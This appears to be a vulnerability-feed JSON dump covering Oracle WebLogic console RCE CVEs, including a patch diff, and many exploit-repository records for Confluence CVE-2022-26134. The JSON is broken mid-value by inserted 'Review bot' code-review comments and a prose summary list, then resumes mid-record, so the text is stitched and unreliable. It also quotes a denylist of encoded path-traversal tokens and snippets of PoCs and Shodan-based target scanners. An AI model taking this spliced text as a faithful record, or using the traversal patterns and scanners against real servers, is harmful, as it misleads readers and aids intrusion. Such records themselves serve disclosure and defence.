CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14883 \u2014 Authenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14883", "CVE-2021-26084"], "modified": "2020-10-29T00:00:00", "id": "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "href": "https://attackerkb.com/topics/XrIT8vLY22/cve-2020-14883-authenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-02T17:14:41", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**wvu-r7** at November 02, 2020 10:26pm UTC reported:\n\nCVE-2020-14750 appears to be the patch bypass for [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server>). Please see CVE-2020-14882\u2019s [Rapid7 analysis](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server#rapid7-analysis>) for more information. The CVE-2020-14750 patch is reproduced below.\n \n \n --- patched1/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 13:13:28.000000000 -0600\n +++ patched2/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 12:11:01.000000000 -0600\n @@ -2,6 +2,7 @@\n \n import com.bea.netuix.servlets.manager.SingleFileServlet;\n import java.io.IOException;\n +import java.util.List;\n import javax.servlet.ServletConfig;\n import javax.servlet.ServletException;\n import javax.servlet.ServletRequest;\n @@ -20,8 +21,6 @@\n \n private static final long serialVersionUID = 1L;\n \n - private static final String[] IllegalUrl = new String[] { \";\", \"%252E%252E\", \"%2E%2E\", \"..\", \"%3C\", \"%3E\", \"<\", \">\" };\n - \n public static void initMBean() {\n MBeanUtilsInitializer.initMBeanAsynchronously();\n }\n 
@@ -39,8 +38,9 @@\n if (req instanceof HttpServletRequest) {\n HttpServletRequest httpServletRequest = (HttpServletRequest)req;\n String url = httpServletRequest.getRequestURI();\n - for (int i = 0; i < IllegalUrl.length; i++) {\n - if (url.contains(IllegalUrl[i])) {\n + if (!ConsoleUtils.isUserAuthenticated(httpServletRequest))\n + throw new ServletException(\"User not authenticated.\"); \n + if (!isValidUrl(url, httpServletRequest)) {\n if (resp instanceof HttpServletResponse) {\n LOG.error(\"Invalid request URL detected. \");\n HttpServletResponse httpServletResponse = (HttpServletResponse)resp;\n @@ -49,7 +49,6 @@\n return;\n } \n } \n - } \n try {\n super.service(req, resp);\n } catch (IllegalStateException e) {\n 
@@ -60,4 +59,15 @@\n LOG.debug(e); \n } \n }\n + \n + private boolean isValidUrl(String url, HttpServletRequest req) {\n + String consoleContextPath = ConsoleUtils.getConsoleContextPath();\n + List<String> portalList = ConsoleUtils.getConsolePortalList();\n + for (String portal : portalList) {\n + String tmp = \"/\" + consoleContextPath + portal;\n + if (url.equals(tmp))\n + return true; \n + } \n + return false;\n + }\n }\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-02T00:00:00", "type": "attackerkb", "title": "CVE-2020-14750 \u2014 Oracle WebLogic Remote Unauthenticated Remote Code Execution (RCE) Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2021-26084"], "modified": "2020-11-19T00:00:00", "id": "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "href": "https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability", "cvss": {"score": 10.0, "vector": 
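Review bot: the `@@ -20,8 +21,6 @@` hunk deletes the `IllegalUrl` array with no replacement in the same hunk, which reads as a regression unless the reader already knows about the allowlist added at the end of the file; a commit-message sentence (or a comment where the field was) stating that the substring denylist `";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"` is superseded by `isValidUrl` would make that explicit. Removing it is the right direction: a denylist of encoded traversal tokens matched with `url.contains` over the raw request URI is exactly the control the description above says was bypassed (CVE-2020-14750 being the bypass of the CVE-2020-14882 fix), and every new encoding would have needed another entry.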
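Review bot: in the `@@ -39,8 +38,9 @@` hunk the two new rejection paths behave differently: an unauthenticated request hits `throw new ServletException("User not authenticated.")`, which the container surfaces as a server error, while a bad URL goes through the pre-existing `LOG.error("Invalid request URL detected. ")` branch and returns. Pick one behaviour for both (a logged rejection with a definite status) so that operators get a single detectable event for probing of the console path, and drop the trailing space in the log string. Second, the URL rejection only returns inside `if (resp instanceof HttpServletResponse)`; the `@@ -49,7 +49,6 @@` hunk shows execution continuing into `super.service(req, resp)` after that block, and the whole check is skipped when `req` is not an `HttpServletRequest`, so a request reaching this servlet through a non-HTTP request or response wrapper is neither authenticated nor validated. Containers pass HTTP types in practice, but failing closed is cheap: throw or return unconditionally when either check fails.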
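Review bot: `isValidUrl(String url, HttpServletRequest req)` in the `@@ -60,4 +59,15 @@` hunk never reads `req`; either remove the parameter or use it (for example to take the context path from the request rather than `ConsoleUtils.getConsoleContextPath()`). The exact-match allowlist itself is sound: `url.equals("/" + consoleContextPath + portal)` compares the undecoded `getRequestURI()`, so `%2E%2E`, `..`, `;` path parameters and any future encoding fail equality instead of having to be enumerated. Two things to cover in tests: that `getConsoleContextPath()` does not already carry a leading slash (the `"/" + ...` prefix would then never match and the console would reject every request), and that every legitimate console entry point is in `getConsolePortalList()`, since anything absent is now a hard 'Invalid request URL' rejection. Minor: hoist `"/" + consoleContextPath` out of the loop.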
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T18:27:50", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**elligottmc** at October 29, 2020 2:27pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**ccondon-r7** at November 01, 2020 4:19pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**lvarela-r7** at October 29, 2020 12:41pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14882 \u2014 Unauthenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555", "CVE-2021-26084"], "modified": "2020-12-28T00:00:00", "id": "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "href": "https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-13T08:06:38", "description": "### CVE-2022-26134\n\nConfluence Server and Data Center - CVE-2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-07-05T04:30:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-13T07:42:16", "id": "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-03T08:04:53", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T02:43:06", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
Further githubexploit records for CVE-2022-26134 in the dump, with the same feed title and scores:

- Published 2022-06-05T18:23:20, modified 2022-06-15T06:14:20, id 09477170-A03D-5C2D-AC41-0D0A8F51EDB3: "CVE-202..."
- Published 2022-06-08T07:54:56, modified 2022-06-09T08:02:12, id 2A83DE3B-242D-51BE-84C8-5EB39AE1800E: "Atlassian Confluence remote code execution vulnerability (CVE-2022-26134). FoFa: title="Con..." (translated from Chinese)
- Published 2022-06-07T19:59:55, modified 2022-06-13T02:44:50, id 66468422-89C0-5AC8-9CEA-6B512338FF7C: "0DAYEXPLOITAtlassianConfluenceCVE-2022-26134. CVE-2022-26134 -..."
- Published 2022-06-07T11:17:25, modified 2022-07-29T16:55:14, id 0E5BE237-A243-54B8-9AD7-92FBA10D1FA2: "Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Ex..."
- Published 2022-06-05T13:41:25, modified 2022-06-05T13:44:25, id 53CC55D8-983C-5FA9-AE81-D20750A6612E: "CVE-2022-26134 poc. Disclaimer: this POC is for learning only; all illegal operations are prohibited; anyone who carries out malicious..." (translated from Chinese)
- Published 2022-06-04T10:27:50, modified 2022-06-07T09:19:24, id 305ADB34-3669-5AAD-8D51-FCFFEF9E3F47: "CVE-2022-26134. (CVE-2022-26134) an unauthenticated and remote ..." (the earliest publication date among the exploit records in the dump)
- Published 2022-06-05T20:35:38, modified 2022-06-06T15:59:14, id 7BE60530-0495-5366-846A-73B1A778DBDA: "CVE-2022-26134. 1) First run the shodan scripts to grabs all t..."
- Published 2022-06-06T15:44:24, modified 2022-06-20T13:48:14, id BAEE7CC9-E997-5B82-A169-AB56B635CC1D: "confluencePot. ConfluencePot is a simple honeypot for the Atla..." (a honeypot, not an exploit, despite the feed's generic title)
- Published 2022-06-07T02:16:56, modified 2022-06-07T02:20:41, id C9B0311C-F06D-5438-B36E-36DCE5FE691D: "CVE-2022-2613..."
- Published 2022-06-07T08:58:07, modified 2022-06-07T09:21:42, id 1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC: "CVE-2022-26134. Implementation of CVE-2022-26134. This reposito..."
- Published 2022-07-05T07:04:50, modified 2022-07-10T08:52:10, id DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6: "CVE-2022-26134 - OGNL injection vulnerability: Script pro..."
- Published 2022-06-24T10:33:13, modified 2022-06-27T22:50:35, id 20BFC1D4-CB1E-51CF-82D8-E4258142BB69: "POC - Atlassian Confluence OGNL Injection Remote Code Executio..."
- Published 2022-06-09T02:11:58, modified 2022-06-22T17:49:52, id 796BB1A4-EF64-57CA-862E-996A72F2FBE5: "CVE-2022-26134. -u URL, --url URL target url; -c COMM..." (usage text translated from Chinese)
- Published 2022-07-12T05:34:09, modified 2022-07-14T14:48:57, id F42BF447-C1A3-5795-8343-D71F096AFF52: "This is a Script to find vulnerable servers to CVE-2022-26134..."
- Published 2022-06-19T13:50:22, modified 2022-07-19T15:02:14, id 5255E938-0B92-5E2C-B1A4-21B2445C29AF: the README opens with an HTML heading "「💥」CVE-2022-26134" followed by a centered image.
- Published 2022-06-10T18:07:16, modified 2022-06-11T11:22:55, id 0989C9B1-62A8-505A-B12F-586D7FAADEEE: "BotCon. Attlasian Confluence Un-Authenticated Remote Code Execu..."
- Published 2022-07-15T10:06:15: "CVE-2022-26134 by 1vere$k. Just simple PoC for the Atlassian Ji..." (the record is cut off in the source before its modified date and id)
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-23T03:35:08", "id": "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-21T04:58:03", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T20:24:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-12T20:24:48", "id": "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-06T09:08:50", "description": "<h1 align=\"center\">Serein | \u8eab\u5904\u843d\u96e8\u7684\u9ec4\u660f</h1> 
\n<p align=\"center\"><im...", "cvss3": {}, "published": "2022-05-31T07:44:01", "type": "githubexploit", "title": "Exploit for CVE-2022-26134", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T09:02:20", "id": "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-07-01T20:46:11", "description": "# CVE-2022-26134 - conFLU\n\nPoC for exploiting CVE-2022-26134 on ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T17:33:18", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T17:34:07", "id": "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-29T17:24:22", "description": "# CVE-2022-26134\r\nCVE-2022-26134 - Confluence Pre-Auth RCE | OGN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T19:24:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T16:13:13", "id": "28E888C4-78E3-5F8D-B316-AB42FED892F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-23T23:00:01", "description": "# Atlassian Confluence OGNL Injection POC Vulnerability CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-06T01:27:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-23T16:53:31", "id": "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T20:00:27", "description": "# CVE-2022-26134\n\n\n# links\n\n https://confluence.atlassian.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T08:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T18:47:54", "id": "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "href": "", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T05:03:07", "description": "# Through the Wire\n\nThrough the Wire is a proof of concept explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:59:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-27T01:07:46", "id": "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T20:01:31", "description": "# Confluence RCE [CVE-2022-26134] Exploit Detection\n\n## Pre-requ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 5.9}, "published": "2022-06-03T13:52:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:48", "id": "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:36", "description": "# CVE-2022-26134 PoC\n\nConfluence Server and Data Center - 